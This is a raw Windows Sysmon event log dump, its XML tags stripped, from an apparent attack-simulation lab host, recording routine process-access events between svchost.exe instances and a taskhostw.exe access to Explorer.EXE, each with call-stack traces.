12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.398{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.383{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.336{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:17.336{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 